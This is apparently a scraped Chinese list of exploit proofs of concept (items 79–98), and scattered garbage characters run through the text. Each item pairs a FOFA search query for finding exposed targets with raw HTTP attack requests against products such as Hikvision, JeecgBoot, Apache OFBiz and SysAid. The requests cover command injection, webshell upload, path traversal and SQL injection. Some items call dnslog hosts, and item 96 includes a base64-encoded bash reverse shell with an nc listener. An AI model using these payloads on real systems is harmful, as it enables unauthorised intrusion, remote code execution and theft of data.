------YsOxWxSvj1KyZow1PTsh98fdu6l9 ^9 n( U% E" m- d% T n7 V4 K
Content-Disposition: form-data; name="target"" o! [; a5 I8 h& C& U3 R+ _
" a7 ?! a: O' Y/ \/Applications/SkillDevelopAndEHS/$ ~7 [# e: W1 ?! N
------YsOxWxSvj1KyZow1PTsh98fdu6l--
& ~+ R: R2 M y
F! h$ _1 o4 T# L; y7 v; l/ R/ j6 |( M! e c6 j9 {
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
x( k8 p' Y( _Host: x.x.x.x
, O8 G, h( S H6 H2 w- P) p
$ f4 n: w" K5 N% o/ `
! \! k/ [' B; P" G& G% K/ T; e79. BYTEVALUE 百为流控路由器远程命令执行1 I; p4 k2 v1 j: X, P, j, T
FOFA:BYTEVALUE 智能流控路由器
' A0 X( o1 s! k( B9 n+ _GET /goform/webRead/open/?path=|id HTTP/1.1
; a2 q" N( W7 F; \. I, b3 o/ d: KHost:IP
$ \( Z1 a0 D/ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.08 V1 W4 g9 w9 n* P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- ~9 \2 H' H; V) mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' P$ u" M8 I) d( s, W( I; [Accept-Encoding: gzip, deflate; D' r6 I+ m1 k' E, l
Connection: close2 y( h: Q2 X, k3 V* ^
Upgrade-Insecure-Requests: 1" [9 `# ?) |" E+ q
2 @0 a! V% m8 W0 P
4 R( i# o% p4 X2 c
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传4 u$ Q" c7 j5 v9 W/ R
FOFA:app="速达软件-公司产品"
0 I0 L: U/ l4 a1 Y* c7 L- L; b+ ePOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1! W( j- }. i' P. q4 S* J
Host: x.x.x.x+ X% D' S: ^* t6 a1 D, y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: N3 k/ w! k: K* C; n' pContent-Length: 27
4 F3 } P* A1 H7 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. G( I6 h0 J6 A2 r! QAccept-Encoding: gzip, deflate
2 R- z5 \" u( H; |7 M6 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' j9 ~) R( @2 ~$ Z) a$ T* cConnection: close
) u. D( L/ L, u/ hContent-Type: application/octet-stream
; b( u. W: t# ~2 U: ~Upgrade-Insecure-Requests: 1
+ i: ?5 {2 z& r3 h F$ e0 r
3 M* \8 T' e x# l. `<% out.print("oessqeonylzaf");%>
) w) s% C1 c x) N- q# l3 E0 l6 `) H# ]. M/ q- j& a9 o) H
; y, U v9 o+ p1 X0 F
GET /xykqmfxpoas.jsp HTTP/1.1
0 G! }2 Y8 T. M0 h0 { @# u, E; HHost: x.x.x.x
% @$ J1 t# P1 h$ uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- y5 r- q9 t* t7 D9 ~! T' c
Connection: close
' @% O4 C* [7 g4 G5 I* v1 ]3 M8 qAccept-Encoding: gzip
0 W2 g2 }( y! v
Z5 f' }; t9 B6 t7 Q$ t1 J: v3 X w. S7 ~
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露3 O% Q8 M) G6 T9 G. t! N: f
FOFA:app="uniview-视频监控": j5 x) o! a# o3 B, ~% O9 y
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
4 Y! O! r7 O4 B3 e, o1 d2 ]4 JHost: x.x.x.x" ^2 ]! L- p4 @8 ]3 i* H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* T9 s ]* O, LConnection: close
. T+ d- f0 A) W6 pAccept-Encoding: gzip7 ], J3 Z0 m! t, T6 B0 L3 C# i: S
! j- M. X; s. K1 E4 g
. g0 u+ p$ H; Y# z, R2 K
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
5 o9 x ^+ C& s1 E! RFOFA:app="思福迪-LOGBASE"% K- L3 J+ `- [( d3 W% x' X! o
POST /bhost/test_qrcode_b HTTP/1.10 L+ x) b+ B1 C' E. `& @5 [/ Q
Host: BaseURL
: Y4 j+ |0 @8 c v3 ?User-Agent: Go-http-client/1.13 I7 r. L7 Q% c
Content-Length: 23* j; ~1 d+ O! G' W. t
Accept-Encoding: gzip
# t$ O# X' Q3 @2 e2 j9 J0 NConnection: close: R3 s5 ^% }' N4 Y2 ?+ c
Content-Type: application/x-www-form-urlencoded
" L# f1 [3 _+ |1 |0 rReferer: BaseURL
! f% f1 ~2 I$ s/ d0 H( \) B1 \9 e; A& |& ]8 P. L7 P2 v( _
z1=1&z2="|id;"&z3=bhost) a5 _, d+ j: o" M- J% h
# S" r, c, D& i5 O
4 O3 h$ Y- U7 W" B
83. JeecgBoot testConnection 远程命令执行, A4 o5 D/ P. u) {% n
FOFA:title=="JeecgBoot 企业级低代码平台"
% X9 E" x ~! R! Z
5 }6 y" {* V; J3 X
9 `1 {* ]( Q! N/ B9 Z, wPOST /jmreport/testConnection HTTP/1.1
9 Z0 { r% b3 B" |% ]5 SHost: x.x.x.x
- r* W9 a( z5 \. O8 A* l7 uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ K; m& r# A% J' \2 c/ Q( i, r( m0 w, b
Connection: close
6 |( i+ Y& X3 t! @* WContent-Length: 8881
7 P" e* U& i6 L1 W5 N0 E& ^) N7 ^Accept-Encoding: gzip& h& X" v- p1 L9 s8 s- b8 j$ _$ B
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
# J4 a( d4 T- l N/ Z9 @+ ?Content-Type: application/json0 p" h1 R: e( A. i# b9 l
% [. o6 J9 k' C) uPAYLOAD- v% R$ }: Y' L3 P' L; f7 W
0 V: D9 |8 Q/ P6 s" ?84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
) |3 ?$ J- l3 r7 b# n( g& V( e aFOFA:title=="JeecgBoot 企业级低代码平台"
+ i$ `% F0 ^2 _% f0 T: G
+ a- V# f6 @% V" f" z9 ?: J$ I5 y6 v8 B3 C# _
. g$ ~. D# Q# H3 n" u: \
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1% @' A- ?/ u/ H* @& ]2 K
Host: 192.168.40.130:8080
% N# c- T x# h, N. iUser-Agent: curl/7.88.1
1 \8 ^$ p* X( }( xContent-Length: 156/ T. B( l( J. }4 b: t6 \
Accept: */*- k7 Y* f; |# E/ C
Connection: close9 i( p* d0 ^$ ]7 @
Content-Type: application/json5 f: U. R/ ~, D" j: T$ `, z3 g( _6 H
Accept-Encoding: gzip' k8 H% c3 x+ R" ^
. w. ~% _( S' w% k
{
6 V( L6 q9 X4 x2 A7 g1 L "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",, _4 _' g2 Z" V, x
"type": "0"' _3 J# v7 N9 z
}; a' R" `# U I3 F' s( i; `
& ]" a6 K& ^; A8 I
/ Q5 f% S9 U7 g G; t( t
85. SysAid On-premise< 23.3.36远程代码执行
6 j6 y: n* L9 N3 {+ Z7 { M* Y0 ~9 RCVE-2023-47246
; L# k6 q8 g( M( h, v c- G( mFOFA:body="sysaid-logo-dark-green.png" ) @/ w" e" B; ^* m- O. P6 v
EXP数据包如下,注入哥斯拉马( O* ?, z: |" Z/ m5 h
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1) G( E+ x3 X/ F, T6 \
Host: x.x.x.x Z- b) y+ H z' j5 w6 V ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% ]- e3 r O% ^* S S3 M% ~Content-Type: application/octet-stream
' O# `# w0 U; }+ iAccept-Encoding: gzip. v' c I N+ \% Z
9 Z3 y4 }) G# e- _! n) fPAYLOAD
) E- g, @) `8 J: u% Y; ~+ S7 |# a+ |8 y5 {, B- ]3 I
回显URL:http://x.x.x.x/userfiles/index.jsp
7 t0 }( n6 `4 z7 }- H+ P+ M. P U. T) b- d) B5 D; U$ M
86. 日本tosei自助洗衣机RCE
* V p: s8 f' aFOFA:body="tosei_login_check.php"3 `$ P* U. W' [4 ~; ~% s
POST /cgi-bin/network_test.php HTTP/1.12 f7 \; a1 h4 F+ \; V
Host: x.x.x.x
! n* Q& D* X. A" yUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
8 ]! k! `; V. n/ @- z: W% `Connection: close0 S' |! n, `. _/ y& s% {) r) R( C* x
Content-Length: 44 B }1 {2 F) W+ A
Accept: */*; F# t7 e5 `# M2 C1 g$ g
Accept-Encoding: gzip$ C/ O- |0 F0 B6 P6 Q
Accept-Language: en
3 ]6 i* _% n3 u: ~7 C" dContent-Type: application/x-www-form-urlencoded/ A. f( R! Q+ A+ y$ I# a; T* r$ T
2 [4 K: p$ m3 T& Z
host=%0acat${IFS}/etc/passwd%0a&command=ping
# r! Q9 x# C# {* I/ F
! X+ ?- l& `, e7 f1 A+ u; ? I( k. R0 }! d! h M2 o% O* T. v* b7 [
87. 安恒明御安全网关aaa_local_web_preview文件上传
5 R. I [& P" o* m( nFOFA:title="明御安全网关"
- L. T( w5 {3 D7 Y( K5 x+ mPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1% P) i! ?! J' d+ ~: T5 T( v# m
Host: X.X.X.X& V( F+ W9 O4 l3 V% U8 t; }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 [) K4 C5 h9 d" J) v' k
Connection: close
, L% z; b4 o# v" L/ g; c) Q: o& YContent-Length: 198/ X- f4 m) s M8 e; }3 a
Accept-Encoding: gzip$ E& P* i5 ?$ Q b( J
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd) O: t! P9 ?% a; y4 n9 }4 D
- ?7 T, G2 |, r2 J2 q. ]8 _' a--qqobiandqgawlxodfiisporjwravxtvd
9 e" H! x1 s! ?2 X' @' T+ i' \Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
+ p% l; w3 ?7 h( v6 ^) a5 ]) H- DContent-Type: text/plain
4 h9 R7 p: A D+ N: G: m) d$ F2 E; ^0 F* o) f, x! \# T2 \+ C
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
3 q& z8 o4 [+ B" H. K--qqobiandqgawlxodfiisporjwravxtvd--0 I ^) w& o* @! d& L& T* e$ @0 l
l- W4 j; ?" N7 e0 N: ?$ }
' g" N4 \. ?) a" ?& L. w; T$ \
/jfhatuwe.php5 _. L7 g: r+ ~+ m% }
) J+ S4 d* f1 l+ P$ [/ U* q% D88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行% Z9 v* V$ b$ k' c- \+ l' n5 v
FOFA:title="明御安全网关"
3 \- F3 Q4 i" q! JGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
3 L& m- J+ m# b( C( c: F2 HHost: x.x.x.xx.x.x.x& q& e5 m9 q; [, _3 w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 S( D2 o3 E# A; l8 q. h* U. `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! R+ `$ T" E1 A6 h) S0 B5 CAccept-Encoding: gzip, deflate. T( @* \* a' ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 m4 l+ _& I2 o0 A- hConnection: close1 S2 Y( u% D& J0 U* d* Y
0 _2 z+ I- J9 F* e: v) M7 b& i8 M: y6 m" s# b* E. _) F8 j
/astdfkhl.php; z3 b! B" S) E1 B3 j
6 h* j1 n \" w) e# ]9 K7 y
89. 致远互联FE协作办公平台editflow_manager存在sql注入7 b9 {& i& W: Y1 A1 e3 P
FOFA:title="FE协作办公平台" || body="li_plugins_download"1 k4 k0 g8 T9 {0 [$ b
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
) V( @, E! |7 i0 v' k3 Q, {& aHost: x.x.x.x
. x2 G6 R) ^( T4 Z l6 [' ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) A6 D/ N% i; O4 |9 [
Connection: close0 T/ \. ?% c* n# d
Content-Length: 41) l& w ^ U1 o* |+ ^ O# x
Content-Type: application/x-www-form-urlencoded; T5 ^% H. X: D+ t/ |1 m; H
Accept-Encoding: gzip
# I: l1 z9 H5 L
O \! S9 @) m6 M3 uoption=2&GUID=-1'+union+select+111*222--+
5 O( V5 }6 n+ C, w5 U
0 ~" Z$ N" ]: `# N; H, [5 S1 o
: _- W7 k+ O ]( m+ i90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
5 C" O8 b2 l0 D) E+ RFOFA:icon_hash="-1830859634"- ^ C4 w- P; m* w- C& o$ a
POST /php/ping.php HTTP/1.1) [! \9 W1 `8 V' q
Host: x.x.x.x
2 }7 H% \& g8 {/ `, N' D, K3 ~5 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0. f! p; ?, \$ H
Content-Length: 51) c* k0 n4 l! ], A4 }* q7 A& j! k
Accept: application/json, text/javascript, */*; q=0.01+ S9 W# c& `9 F9 |; c2 |; b
Accept-Encoding: gzip, deflate: V' s+ u) M( m% g2 b9 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% t3 _, E9 f" Y6 V/ h
Connection: close0 J& L1 V7 w- s3 v
Content-Type: application/x-www-form-urlencoded
2 F& p5 }4 g: R3 F: Z: |+ H& M- ^X-Requested-With: XMLHttpRequest/ ?0 q. ]7 v b& Q# y' }9 ]2 k* ?; x
! Q t3 y5 k' }% S) Rjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig9 ]% _8 g+ ^" ]. E5 ?' F
: h1 c% \) k* I" A1 h
1 ~. j+ ?0 N& `* ]) L91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取) u5 {. ]/ p/ A
FOFA:title="综合安防管理平台"3 I/ e5 ~) _* N, c1 b- m
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.18 W4 i! Z0 [& P8 _) q* f
Host: your-ip _+ j, f- _5 \, D9 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! y5 T+ ` g. ~ d" D J) L6 DAccept-Encoding: gzip, deflate: X$ f, m! B# \ g/ o) ?, J
Accept: */*7 F- Z- `5 Q4 j
Connection: keep-alive
& [$ n' m, p& n# }4 P5 r4 f
# b7 n* p7 ^4 l! {2 o2 M/ B0 f! h4 P- o- u/ s% @
1 r9 k. _0 |" }! y92. 海康威视运行管理中心session命令执行
) Y7 B1 s' _: [: i: a S0 G* TFastjson命令执行& A8 t8 d% y" K3 F3 t
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
* m# t% p" p- W/ D- r' b1 z+ JPOST /center/api/session HTTP/1.1# F( n- A1 o6 v1 e$ [# a6 _
Host:% y! L8 G2 {" _; v5 a
Accept: application/json, text/plain, */*9 |! E1 O/ v1 t* y
Accept-Encoding: gzip, deflate- J% `, n4 r' _! \$ v
X-Requested-With: XMLHttpRequest
( v* e, m, `4 W7 LContent-Type: application/json;charset=UTF-8" J' `& ^7 F, k, C# x" M) G) }
X-Language-Type: zh_CN
1 X/ E `* \0 ]Testcmd: echo test0 @, i: ]# C! I( l/ v _; z' f6 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3 N& g2 M. u% D2 T( P( rAccept-Language: zh-CN,zh;q=0.9
; Z- f$ U# o5 i5 SContent-Length: 57782 d1 k/ Q1 [. P& f
) D+ K) X* R3 e
PAYLOAD
0 s) t5 {% N j& f4 X
d: J% X! j: m* s5 ~# d( J, ?2 q; L B1 i- V7 p- t: k7 G5 r
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传! S* | U0 [) H8 B+ W9 O
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==": i$ G# _5 W& C! f' f
POST /?g=app_av_import_save HTTP/1.1
, O8 Z5 C1 O2 m9 q6 M# ]4 D% oHost: x.x.x.x3 a$ C- B) E' N( K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx3 Z( L+ r- c0 C) a& r- L: ?+ z: g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" |" K i5 }. u) W: }- ~
( U6 M' s A% r$ c------WebKitFormBoundarykcbkgdfx
# o9 B" H K+ X- O m7 ^" D) CContent-Disposition: form-data; name="MAX_FILE_SIZE"8 Q/ m. t' A4 ?0 _# `8 H. z
' D; V* K5 J1 H$ T, l5 b+ D4 m M: F10000000
% d! K$ @( f% D, F4 l------WebKitFormBoundarykcbkgdfx* v6 x! y6 o1 p) R3 H& `
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
! y1 x% U+ Q; U. X2 HContent-Type: text/plain$ F3 E' O3 i3 _) ~
' l' ^& t" @: Q7 C8 o6 z% k7 dwagletqrkwrddkthtulxsqrphulnknxa
3 j i( m0 _4 t& G1 U6 M8 N/ @------WebKitFormBoundarykcbkgdfx. u) Q6 L6 e# I) q6 X# p
Content-Disposition: form-data; name="submit_post"* p c5 k& Z& l# o* p1 o S
( [7 v$ | \, x: o0 `) R( yobj_app_upfile
6 ^9 T3 s8 S' T- v$ q------WebKitFormBoundarykcbkgdfx& d$ d* y) X3 ]0 E% c: M5 R; a# g
Content-Disposition: form-data; name="__hash__"7 U! o+ J9 R5 r4 t" k6 N: D
1 f, w" a/ ~) C$ I( q% ^5 H0b9d6b1ab7479ab69d9f71b05e0e9445
: \" Q0 `3 W# e& B------WebKitFormBoundarykcbkgdfx--8 B& Y& Z) ]% n9 r
8 k1 H; c2 T0 R: Q/ w
! X9 m% _* X# H4 g0 p
GET /attachements/xlskxknxa.txt HTTP/1.1
, O1 o- o9 U( F b; KHost: xx.xx.xx.xx9 l$ X! V% M" P7 q$ s$ K: [1 T- W
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 V, g+ A4 a# O$ }+ f' e* k& v9 i! j
$ _& q/ u& S" D
! N5 x |+ _; J0 i94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
; ~5 O. R' e( ^3 S" n- v/ s" GFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="0 D; G3 j s0 |2 h4 O' R( e
POST /?g=obj_area_import_save HTTP/1.1- G1 f$ I, D% W/ v+ ~ r" S8 `
Host: x.x.x.x* s" I3 p: L5 W0 O9 N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt% }. m- M. x0 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* i* Z1 k8 d0 G) v: A2 h$ c4 G: E! k( |
* e- |: m/ I$ C+ I7 y
------WebKitFormBoundarybqvzqvmt7 D0 ~1 w5 x ]) F( x) ^: [
Content-Disposition: form-data; name="MAX_FILE_SIZE"3 y# z. n& s ?* Q
Y0 Z. p$ |" |% }100000005 m" G- T; S6 q' |
------WebKitFormBoundarybqvzqvmt3 s$ \8 x* }. x9 y7 u# w: D$ |
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
" K. D. }: S# ?8 N, x J1 X/ v; Y/ OContent-Type: text/plain
+ S3 B4 c7 W. x' s- q* Y5 V7 c: K: l/ ^! f( q" ?
pxplitttsrjnyoafavcajwkvhxindhmu; d: R1 K6 j9 o+ u
------WebKitFormBoundarybqvzqvmt
8 J" f7 e k+ _# N0 g7 j8 IContent-Disposition: form-data; name="submit_post"
* y! H+ w! D0 s& B3 K% t+ E) H8 r2 S
obj_app_upfile- S0 E0 O& ?7 n {0 U
------WebKitFormBoundarybqvzqvmt) C6 L/ l/ l: o& w8 |+ @& G. q; t2 f, S
Content-Disposition: form-data; name="__hash__"
5 x1 k( k9 g, ?! m1 t: Y! s# M5 z6 t3 q
0b9d6b1ab7479ab69d9f71b05e0e9445
! g1 `0 W( S, m/ f1 O* f: \6 h------WebKitFormBoundarybqvzqvmt--
, A4 u$ F' O5 }& v3 D: q7 W) O4 n* n4 n2 V. s$ y1 w4 m# \
# q: q- O8 v& Q3 |$ ~# A
. I! t8 |6 P7 w S/ \
GET /attachements/xlskxknxa.txt HTTP/1.1
, b, v5 V2 b7 kHost: xx.xx.xx.xx3 h5 u7 N' g( @6 e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: W5 {1 R" a' {) q8 P5 P* R4 g& Q% o5 V8 D1 u( _" L! W2 W& b
5 s0 Y* N, g7 X
; X" D' y2 m7 M
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
& u9 p" N+ ^! C5 R0 uCVE-2023-49070# L9 X: R( x) ~* b9 C* h/ o
FOFA:app="Apache_OFBiz"
6 |. I" e- \8 s; H6 ~/ N8 G9 T1 ]3 @POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
$ e; F6 B9 Q/ V6 L1 mHost: x.x.x.x
) h1 a6 K' H! W5 v: ]2 t8 fUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.368 M8 H+ [9 b. b6 r/ Q7 t2 [
Connection: close$ t' L& w8 F+ m! G H0 e( Y0 ]
Content-Length: 889 c: ~; p- s# H$ }* @
Content-Type: application/xml
4 w# ^2 ^$ F& Q8 QAccept-Encoding: gzip
5 ~6 W4 q/ m. `3 a& G& E: ~, R6 b. I3 X1 ]/ C/ L7 P" ~
<?xml version="1.0"?>
: d5 K7 C. j& e9 \8 @1 L5 B6 O<methodCall> K5 J& H* j( l B
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
) O8 d/ B# }( n& i1 n* d <params>+ Y0 n! v- }7 o7 s- J w
<param>
) {/ d' e2 p' B <value>* y Q8 |( _$ z/ f0 j
<struct> [ f3 G' @) L
<member>9 @; G$ }: }' }
<name>test</name>
f/ y" A _) ^$ t, S* G/ ^ <value>
5 A7 T) p- P" Q/ q <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>" G3 n" p- L2 |+ G; v, v0 E$ r
</value>
, L7 w0 R0 W* G" b* I$ W o </member>
3 f' e+ k* `: a$ j8 E </struct>
1 K" l' ~/ `4 A </value>
0 A) c( ^6 I$ b2 F# H </param>$ J/ v" P! ?/ G1 W$ M/ Q. A
</params> j* H3 K% G( i8 m
</methodCall>$ h* {( p8 s3 L1 b# \. ^8 _) p: K
5 k/ @) h! w5 I1 j/ V
! r2 A9 n1 N* C2 @
用ysoserial生成payload
& b$ m' m( p) }9 F4 Hjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
/ d: [3 L2 X7 W; {$ ]% j2 M4 ~# _. R; u1 ~+ h/ ^
/ z( ]8 d7 M! E将生成的payload替换到上面的POC
. m% O! d4 z0 f" k$ q! B, V1 d oPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
" P4 s# k8 U5 u M; W% f7 ^' b* vHost: 192.168.40.130:8443/ S5 a0 L* q/ |7 B# w! x p6 p
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36; P1 S& y p V
Connection: close' L: x: G' P9 a/ h/ L
Content-Length: 8898 Q, S: ]- ]3 p7 t. y$ H. u9 b% k) B
Content-Type: application/xml
' Q {+ n# h9 C) uAccept-Encoding: gzip
/ @( k* b; q9 g* y# h/ y5 S& ~* j7 \' T) b2 U9 S
PAYLOAD3 G# M; u6 q5 m3 c3 N! z
2 y3 k; `* J) k T- {5 n7 f( e
96. Apache OFBiz 18.12.11 groovy 远程代码执行
$ U/ T2 [4 V! Q3 c$ YFOFA:app="Apache_OFBiz"! t: j) M5 Q( G. h' i' ^. E
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1( O$ p. ]# K& ^4 R+ {, a
Host: localhost:8443
" m4 @2 x! j, q/ O% O2 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( X5 T' K: R6 ]Accept: */*
$ Q" \& |* ^/ `1 F5 j6 O% r9 i, J$ }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. J! M2 U" v# i3 M" x* AContent-Type: application/x-www-form-urlencoded
' y1 x) A0 j F+ }* O) n; PContent-Length: 552 n7 U2 v3 ~1 n) `
8 A6 P( i% S4 o7 Q- \
groovyProgram=throw+new+Exception('id'.execute().text);% j; x4 Q/ `4 u% I: P
: f7 } L' g, R' d3 q3 k z C/ h
反弹shell
3 J5 S- o8 C9 `2 @5 h. m2 c$ O' l( r在kali上启动一个监听
$ S% \- m c2 O1 }nc -lvp 7777
7 E! f ]' H" r1 [1 C
6 `$ W! \: C2 n! _POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1* q2 z' J) l( o: K
Host: 192.168.40.130:8443! n9 ?( E$ s" M- |. t7 R, X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
. G3 U$ \5 K& t% A; G6 i4 p# fAccept: */*
! `0 R" `+ i, @0 R$ k( HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; s% j& d, U0 D, q% n! w; e5 P/ w
Content-Type: application/x-www-form-urlencoded }* S% i- Y \/ x& f& L6 o( G
Content-Length: 711 `" T5 }8 F, ^% e
/ [* _; T% E4 _1 p) m& JgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
9 i; K% S% X) f* v4 e6 y
* Q+ `8 _, K) ?" M5 t97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
" S. A* E, }/ q" f6 bFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
* Y& \7 e* W* n3 nGET /passport/login/ HTTP/1.1; \+ ~; Q; R# C+ x9 o
Host: 192.168.40.130:8085+ c6 t" x# U; I( I% i( w! X8 F z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! a4 ^7 @6 u* G: H' x& O" n9 q
Accept-Encoding: gzip! R5 {+ j8 b1 P
Connection: close
. v3 T6 a3 V# e2 YCookie: rememberMe=PAYLOAD
3 V9 {2 @- A7 J0 [X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
$ ^4 D, f" j" A# Y; }
. z# w e+ l5 e- f; x" y) \2 i% W7 K& [9 u6 R! d" e ^' {! A4 S
98. SpiderFlow爬虫平台远程命令执行
- o9 r. O) @( E/ v1 nCVE-2024-0195( M. R; L/ d5 j
FOFA:app="SpiderFlow"2 F+ D A. K U2 H% U. H
POST /function/save HTTP/1.1
8 D: M" p7 N% u( J, qHost: 192.168.40.130:8088* U; H& A$ G7 l5 i; j9 L7 [& P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
